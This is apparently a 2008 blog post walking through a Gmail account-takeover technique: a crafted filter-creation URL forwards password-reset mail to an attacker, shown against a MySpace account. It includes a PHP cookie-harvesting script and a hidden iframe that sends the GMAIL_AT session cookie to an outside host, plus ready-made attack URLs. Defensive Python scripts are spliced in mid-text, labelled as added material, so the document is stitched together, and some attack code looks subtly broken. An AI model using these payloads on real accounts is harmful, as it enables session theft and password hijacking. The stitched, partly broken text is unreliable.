Update: Apparently, the users whose domains were hijacked were hit by phishing attacks instead of by the vulnerability described below. Google denies this vulnerability and says the bug was fixed last year. I was, however, still able to create the filter by forming the URL described when I didn’t sign off correctly (by clicking the Sign Off link). More testing is needed…

Various reports are describing a new (but somewhat old) exploit used to hijack GoDaddy domains[1]. However, the same exploit can be used to retrieve the password for any service provider with which the user registered using his Gmail account.

The basic idea is to create a filter on the victim’s account that redirects e-mails from various service providers to another e-mail account. A malicious individual would then use the providers’ “I forgot my password” option to have the password sent to the victim’s e-mail address. Of course that e-mail will be filtered and redirected to the attacker’s account without the user’s knowledge.

Step 1: Creating the filter

Note: The following methods for retrieving information from the victims are only theories. I have not tested any of the following methods. If you have more information, please share it with the community by leaving a comment.

For that we will need to craft the HTTP address that Google Mail uses to create the filter. This is the core of this exploit: creating the filter without the user’s username and password. However, we still need to retrieve some information from the victim. We will need the Unique Account Identifier (UAID) and the Session Authorization Key[2].

a) Getting the Unique Account Identifier

Getting the UAID is not easy…unless your victim has a website with Google’s AdSense. If that is the case, navigate to their website and view the page source. Locate the AdSense HTML and look for the ‘google_ad_client’ line:

    <script type="text/javascript"><!--
    google_ad_client = "pub-8479810701377729";
    google_ad_width = 728;
    google_ad_height = 90;
    google_ad_format = "728x90_as";
    google_ad_type = "text";
    google_ad_channel ="9419437988";
    google_color_border = "D699DD";
    google_color_bg = "F5EBF3";
    google_color_link = "E600B1";
    google_color_text = "000000";
    google_color_url = "995AE3";
    //--></script>
    <script type="text/javascript"
    src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
    </script>

The large number you see after the “pub-” is the user’s Unique Account Identifier. But it is in plain form: if you try to use this number as-is in the crafted address, it won’t work. More information is needed to form the “header” format required.

Now, most users don’t have a website, let alone AdSense. Another way would be to exploit a small library called libgmailer, which stores the identifier in a cookie in order to resume a session:

define("GM_COOKIE_IK_KEY",        "LIBGMAILER_IdKey");
…
/**
 * @return bool Success or not.
 * @desc Recover session information.
 */
function getSessionFromBrowser() {
    Debugger::say("Start getting session from browser...");

    if (!$this->use_session) {
        return $this->getCookieFromBrowser();
    }
    // Changed to support IK; by Neerav; 13 July 2005
    // Last modified by Neerav; 14 Aug 2005
    if (isset($_SESSION[GM_COOKIE_KEY])) {
        $this->cookie_str =
            base64_decode($_SESSION[GM_COOKIE_KEY]);

        // The identifier ("IK") is kept in the PHP session alongside the cookie string
        if (isset($_SESSION['id_key'])) {
            $this->cookie_ik_str = $_SESSION['id_key'];
        }
    }
    …
}

In that case, it comes down to stealing the information from the cookie stored by libgmailer. This is a generic technique and is explained in the second section of this article.

Other ways to get the identifier are to look at libraries or software that interface with Gmail. If I had more time, I would gladly look into their source code, as this would probably tell us a lot about how they get this key from Gmail. If you have any suggestion, observation or know how to get the Unique Account Identifier, please leave a comment so we can share the information. For those interested in looking, try searching Google Code, or Google Code Search, for open source software for Gmail.

b) Getting the Session Authorization Key

This information is contained in the victim’s cookie called GMAIL_AT:

GMAIL_AT=909a71ce538b366d-ffe3455bd0aa

GMAIL_AT Cookie Value in Firefox

There are many ways to get that information. Of course, if you have direct access to the victim’s computer, just fetch a copy of the cookies, which are located at:

Otherwise, the best way to steal cookies is by creating a malicious website, or exploiting a forum or any other website that allows iframes and JavaScript. This part works like any cross-site scripting exploit for stealing cookies. You first need to set up a script that will receive the data contained in the cookie. A very simple script:

<?php
    // Value passed in the query string by the page that reads the cookie
    $SAKey = $_GET["cookie"];

    if ($SAKey && is_writable('keys.txt')) {
        $hFile = fopen('keys.txt', 'a');   // append mode: one key per line
        if ($hFile) {
            fwrite($hFile, $SAKey . "\n"); // '.' is PHP's string concatenation operator
            fclose($hFile);
        } else {
            echo "Could not open 'keys.txt' for writing";
            exit;
        }
    } else {
        echo "Specified key is empty or 'keys.txt' is not writable";
        exit;
    }
?>

This script is saved into a PHP file and put online on a free site that supports PHP. Now we have our cookie saver set up at some address, for example: http://www.angelfire.com/someuser/cookie.php

We will now code the malicious script that we will embed in a webpage. For that we will use a tiny IFRAME that won’t be visible to the user[3]. We will set it so it’s one pixel wide by one pixel high. This IFRAME will point to our cookie saver script, so that when the page loads, a GET request is made by a JavaScript call:

<IFRAME
    SRC="javascript:window.location=%22 http://www.angelfire.com/someuser/cookie.php?cookie=%22+
document.cookie['GMAIL_AT']"
    HEIGHT="1"
    WIDTH="1"
    FRAMEBORDER="0">
</IFRAME>

This code will change the IFRAME source to point to our cookie saver and will read the value of the GMAIL_AT cookie stored on the user’s computer. If you now look at the ‘keys.txt’ file on your account, you should have a new Session Authorization Key.
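The read through document.cookie described above only succeeds when the cookie is exposed to script: a cookie set with the HttpOnly flag is not visible to document.cookie at all, and the Secure flag keeps it off plain HTTP. The following Python audit is an added example, not code from the original post: it parses Set-Cookie header values (a constructed sample, with the GMAIL_AT name taken from this post and a hypothetical SID cookie) and reports which session cookies are missing those flags.

```python
"""Audit Set-Cookie headers for session cookies a page script could read.

Added example, not from the original post. Input: Set-Cookie header values
as a server would emit them (constructed sample below). A cookie without
HttpOnly is readable through document.cookie by any script running in that
origin, which is the precondition for the theft the post describes; a cookie
without Secure also travels over plain HTTP.
"""

# Constructed sample headers: the first mirrors the post's GMAIL_AT cookie as
# a script-readable cookie, the second (hypothetical SID) is the hardened form,
# the third is a non-session preference cookie.
SAMPLE_SET_COOKIE_HEADERS = [
    "GMAIL_AT=909a71ce538b366d-ffe3455bd0aa; Path=/mail; Domain=mail.google.com",
    "SID=ExAmPlE123; Path=/; Domain=.google.com; Secure; HttpOnly",
    "PREF=lang=en; Expires=Wed, 24 Nov 2010 10:00:00 GMT; Path=/",
]

# Cookie names treated as session-bearing (GMAIL_AT from the post, SID assumed)
SESSION_COOKIE_NAMES = ("GMAIL_AT", "SID")


def parse_set_cookie(header):
    """Split one Set-Cookie value into (name, value, {attribute: value}).

    Flag attributes such as HttpOnly and Secure carry an empty value;
    attribute names are lower-cased because they are case-insensitive.
    """
    pieces = [p.strip() for p in header.split(";")]
    name, _, value = pieces[0].partition("=")
    attrs = {}
    for piece in pieces[1:]:
        if not piece:
            continue
        key, _, val = piece.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value, attrs


def audit_cookie(header, session_names=SESSION_COOKIE_NAMES):
    """Return (name, findings) for one header; findings is empty when fine
    or when the cookie is not considered a session cookie."""
    name, _, attrs = parse_set_cookie(header)
    findings = []
    if name in session_names:
        if "httponly" not in attrs:
            findings.append("script-readable (missing HttpOnly)")
        if "secure" not in attrs:
            findings.append("sent over plain HTTP (missing Secure)")
    return name, findings


def audit_headers(headers, session_names=SESSION_COOKIE_NAMES):
    """Map each session cookie name seen in the headers to its findings."""
    report = {}
    for header in headers:
        name, findings = audit_cookie(header, session_names)
        if name in session_names:
            report[name] = findings
    return report


if __name__ == "__main__":
    for name, findings in audit_headers(SAMPLE_SET_COOKIE_HEADERS).items():
        print("%s: %s" % (name, "; ".join(findings) or "ok"))
```

Run against a real response by feeding it the list of Set-Cookie headers from a captured HTTP exchange; anything reported as script-readable is exactly what the iframe trick above depends on.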

Once you have all the information, the only thing left to do is to craft an HTTP address that we will send directly to Google. This address is the URL Google uses to create the filter.

http://mail.google.com/mail/
?ui=2
&ik=<Unique Account Identifier>
&at=<Session Authorization Key>
&view=up
&act=cf
&rt=h
&zx=pjo6fg-k2ljzh
&search=cf
&cf1_from=<Email address to filter>
&cf2_emc=true
&cf2_email=<Email address to send filtered email address>
&cf2_tr=true

Here ik is the variable for the Unique Account Identifier you found in step 1a, and at is the variable containing the Session Authorization Key you retrieved in step 1b. The cf1_from variable is the e-mail address you wish to intercept, and cf2_email is the address to which messages from the cf1_from address will be redirected. Once the address is crafted, just paste it into your browser and the filter will be created. Example:

http://mail.google.com/mail/?ui=2&ik=99999we6wr&at=kj398jkaee8hf8s58i9siuqm1j&view=up&act=cf&rt=h&zx=pjo6fg-k2ljzh&search=cf&cf1_from=support@provider.com&cf2_emc=true&cf2_email=cyberwarfaremag@attacks.org&cf2_tr=true
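As an added example that is not part of the original post, the following Python script shows how a defender would recognise a request of this shape in a web-proxy log: it parses the query string for the act=cf action and the cf1_from / cf2_emc / cf2_email / cf2_tr parameters described above and reports every GET that creates a forwarding filter, marking targets outside the account’s own domain. The log format (timestamp, client IP, method, URL) and the own-domain list are assumptions; the sample lines are constructed and include the example URL from this post.

```python
"""Spot Gmail filter-creation requests that forward mail to another address.

Added example, not code from the original post. It assumes a web-proxy log
with whitespace-separated fields: timestamp, client IP, HTTP method, URL
(a constructed format). The Gmail query parameters it looks at (act=cf,
cf1_from, cf2_emc, cf2_email, cf2_tr, at) are the ones the post describes.
"""
from urllib.parse import urlsplit, parse_qs

GMAIL_HOSTS = {"mail.google.com"}

# Constructed sample log: an ordinary mailbox view, the post's own example
# URL, an unrelated site, and a filter that forwards within gmail.com.
SAMPLE_PROXY_LOG = """\
2008-11-24T10:01:02Z 192.0.2.10 GET http://mail.google.com/mail/?ui=2&view=tl&search=inbox
2008-11-24T10:01:09Z 192.0.2.10 GET http://mail.google.com/mail/?ui=2&ik=99999we6wr&at=kj398jkaee8hf8s58i9siuqm1j&view=up&act=cf&rt=h&zx=pjo6fg-k2ljzh&search=cf&cf1_from=support@provider.com&cf2_emc=true&cf2_email=cyberwarfaremag@attacks.org&cf2_tr=true
2008-11-24T10:02:33Z 192.0.2.11 GET http://www.example.org/index.html
2008-11-24T10:03:00Z 192.0.2.12 GET http://mail.google.com/mail/?ui=2&ik=abc&at=def&view=up&act=cf&search=cf&cf1_from=alerts@bank.example&cf2_emc=true&cf2_email=me@gmail.com
"""


def parse_filter_request(url):
    """Describe a Gmail 'create filter' request, or return None.

    A request counts when it hits a Gmail host under /mail with act=cf.
    The forwarding address is cf2_email, but only when cf2_emc=true.
    """
    parts = urlsplit(url)
    if parts.hostname not in GMAIL_HOSTS or not parts.path.startswith("/mail"):
        return None
    qs = parse_qs(parts.query)

    def first(key, default=""):
        return qs.get(key, [default])[0]

    if first("act") != "cf":
        return None
    return {
        "from_filter": first("cf1_from"),
        "forward_to": first("cf2_email") if first("cf2_emc").lower() == "true" else "",
        "trash": first("cf2_tr").lower() == "true",
        # 'at' is what the post calls the Session Authorization Key
        "has_session_token": bool(first("at")),
    }


def is_external(address, own_domains=("gmail.com",)):
    """True when the address's domain is not one the account owner controls."""
    if "@" not in address:
        return False
    return address.rsplit("@", 1)[1].lower() not in own_domains


def scan_proxy_log(text, own_domains=("gmail.com",)):
    """Return (timestamp, client_ip, details) for every GET that creates a
    forwarding filter; details['external'] marks off-domain targets."""
    findings = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4 or fields[2] != "GET":
            continue
        ts, client, _, url = fields[:4]
        details = parse_filter_request(url)
        if details and details["forward_to"]:
            details["external"] = is_external(details["forward_to"], own_domains)
            findings.append((ts, client, details))
    return findings


if __name__ == "__main__":
    for ts, client, d in scan_proxy_log(SAMPLE_PROXY_LOG):
        flag = "EXTERNAL" if d["external"] else "internal"
        print("%s %s: mail from %r forwarded to %r [%s] trash=%s"
              % (ts, client, d["from_filter"], d["forward_to"], flag, d["trash"]))
```

Any filter creation arriving as a plain GET with a forwarding target is worth a look; an external target combined with cf2_tr=true (forward and delete) is the pattern this post relies on.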

Step 2: Password Hunting Time

Once the filters are in place, the easiest part begins. All you need to do is visit the providers from which you want to steal the passwords and use the “I forgot my password” feature available on most of them. The e-mail sent by the provider’s support will then be redirected to the e-mail address you specified in step 1. You can use social networking sites to try to find out which services the user is registered with.

Let’s try it with a MySpace account. Imagine we already have the Unique Account Identifier (a2j3e44rt56) and the Session Authorization Key (909a71ce538b366d-ffe3455bd0). We want to intercept messages from MySpace (“@message.myspace.com”) and redirect them to our account, so our link will be:

http://mail.google.com/mail/?ui=2&ik=a2j3e44rt56&at=909a71ce538b366d-ffe3455bd0&view=up&act=cf&rt=h&zx=pjo6fg-k2ljzh&search=cf&cf1_from=@message.myspace.com&cf2_emc=true&cf2_email=cyberwarfaremag@fastmail.com&cf2_tr=true

Our filter is now created on the victim’s account:

MySpace Filter created by using the Gmail Exploit

Then we visit MySpace to get the password:

MySpace "Forgot Password?" option with the victim's e-mail
MySpace forgotten password sent to the user

And if we look at our e-mails now, guess what we received!

Received MySpace e-mail in our Fastmail account, forwarded from Gmail

And nothing is visible in Gmail unless the user looks at his/her filters. That summarizes the Gmail exploit recently resurfacing in the news.
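Since the filter list is the only place the change shows, that list is where a defender should look. The following Python script is an added example, not anything from the original post: it reads a Gmail filter export (the Atom XML format as I understand it, with apps:property elements named forwardTo and shouldTrash) and flags filters that forward or discard mail. The sample export is constructed to contain one ordinary labelling filter and the MySpace filter described above.

```python
"""Flag mail filters that forward or discard messages, from a filter export.

Added example, not from the original post. It parses the Atom-style XML that
Gmail's filter export produces, one <entry> per filter with
<apps:property name="..." value="..."/> children (the format as I understand
it; "forwardTo" and "shouldTrash" are the property names it uses). The sample
document below is constructed.
"""
import xml.etree.ElementTree as ET

ATOM_NS = "http://www.w3.org/2005/Atom"
APPS_NS = "http://schemas.google.com/apps/2006"

SAMPLE_FILTER_EXPORT = """\
<feed xmlns="http://www.w3.org/2005/Atom" xmlns:apps="http://schemas.google.com/apps/2006">
  <title>Mail Filters</title>
  <entry>
    <category term="filter"/>
    <title>Mail Filter</title>
    <apps:property name="from" value="newsletter@example.org"/>
    <apps:property name="label" value="Newsletters"/>
  </entry>
  <entry>
    <category term="filter"/>
    <title>Mail Filter</title>
    <apps:property name="from" value="@message.myspace.com"/>
    <apps:property name="forwardTo" value="cyberwarfaremag@fastmail.com"/>
    <apps:property name="shouldTrash" value="true"/>
  </entry>
</feed>
"""


def load_filters(xml_text):
    """Return one dict of property name -> value per filter entry."""
    root = ET.fromstring(xml_text)
    filters = []
    for entry in root.iter("{%s}entry" % ATOM_NS):
        props = {}
        for prop in entry.iter("{%s}property" % APPS_NS):
            props[prop.get("name")] = prop.get("value")
        filters.append(props)
    return filters


def suspicious_filters(filters, own_domains=("gmail.com",)):
    """Return (from-criterion, reasons) for filters that forward mail or
    trash it, the two actions the post's filter combines. Forwarding to a
    domain outside own_domains (an assumed list) is called out as external."""
    flagged = []
    for props in filters:
        reasons = []
        target = props.get("forwardTo")
        if target:
            domain = target.rsplit("@", 1)[-1].lower()
            where = "external " if domain not in own_domains else ""
            reasons.append("forwards to %saddress %s" % (where, target))
        if props.get("shouldTrash", "").lower() == "true":
            reasons.append("deletes matching mail")
        if reasons:
            flagged.append((props.get("from", "<any sender>"), reasons))
    return flagged


if __name__ == "__main__":
    for criterion, reasons in suspicious_filters(load_filters(SAMPLE_FILTER_EXPORT)):
        print("filter on %r: %s" % (criterion, "; ".join(reasons)))
```

A filter that both forwards and trashes, as the MySpace one does, is the signature of this technique: the owner never sees the message, and the only evidence is the rule itself.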


[1] “Domain hijack fears over Gmail exploit”, John Leyden, The Register, November 24, 2008, http://www.theregister.co.uk/2008/11/24/gmail_exploit/ (accessed on November 24, 2008)

[2] “Gmail Security Flaw Proof of Concept”, GeekCondition, November 23, 2008, http://geekcondition.com/2008/11/23/gmail-security-flaw-proof-of-concept/

[3] “Cookie Stealing for phun and profit”, Athleone, DarkMindz, http://www.darkmindz.com/articles/cookie-stealing-for-phun-and-profit-num364.html (accessed on November 24, 2008)